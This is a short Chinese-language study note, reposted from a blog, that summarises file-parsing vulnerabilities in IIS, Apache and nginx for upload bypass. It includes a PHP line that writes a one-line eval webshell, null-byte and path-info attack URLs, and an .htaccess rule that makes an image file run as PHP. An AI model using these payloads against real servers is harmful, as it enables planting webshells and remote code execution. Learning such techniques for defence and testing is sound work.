首页 > 其他 > 详细

解析漏洞总结

时间:2020-12-15 15:04:17      阅读:24      评论:0      收藏:0      [点我收藏+]

首先说下为什么要写着篇文章,之前学习倒是学过,学完就忘啊,tmd

iis 5.x/6.0 

 一,两种解析漏洞

        1.目录解析
        2./xxx.asp/xx.jpg
 二。文件解析漏洞

         1.xxx.asp;.jpg
    比如说上传一个一句话木马,将木马名字改为xxx.asp;.jpg 然后再上传,识别先从后往前,
        看到jpg文件然后就以为你是jpg文件可以上传,
        上传上去之后,服务器进行解析的时候他是从后往前的看到asp格式的文件直接进行解析

Apache 解析

       xxx.php.xxxx    
    首先Apache解析文件时是从右往左判断的,如果右边第一次未识别他将继续往左解析,通常我们直接在文件名后边添加xxxx

IIS 7.0/IIS7.5/nginx <8.03 畸形解析漏洞

       80sec发现的
       在默认开启Fast-CGI开启的清空下,攻击者可以上传一个名字为xxx.jpg ,内容为
    <?php fputs(fopen(‘shell.php‘,‘w‘),‘<php eval($_POST[cmd])?>‘);?>
    的文件,然后访问xxx.jpg/.php,访问之后就在这个目录下生成一句话木马shell.php
    www.xxx.com/logo.gif/*.php 触发漏洞(有漏洞会吧前面文件当做php执行)

Nginx <8.03 空字节代码执行漏洞

影响版本:0.5 0.6 0.7<=0.7.65        0.8<=0.8.37
Nginx在图片中写入php代码然后通过访问
xxx.jpg%00.php
来执行其中的代码

htaccess文件解析

如果在Apache中.htaccess可被执行,企鹅可被上传,那可以尝试在.htaccess中写入:
<FilesMatch  "shell.jpg"> setHandler application/x-httpd-php </FilessMatch>
然后在上传shell.jpg 的木马,这样的shell.jpg就可解析问php文件

解析漏洞总结

原文:https://www.cnblogs.com/bflw/p/14138057.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!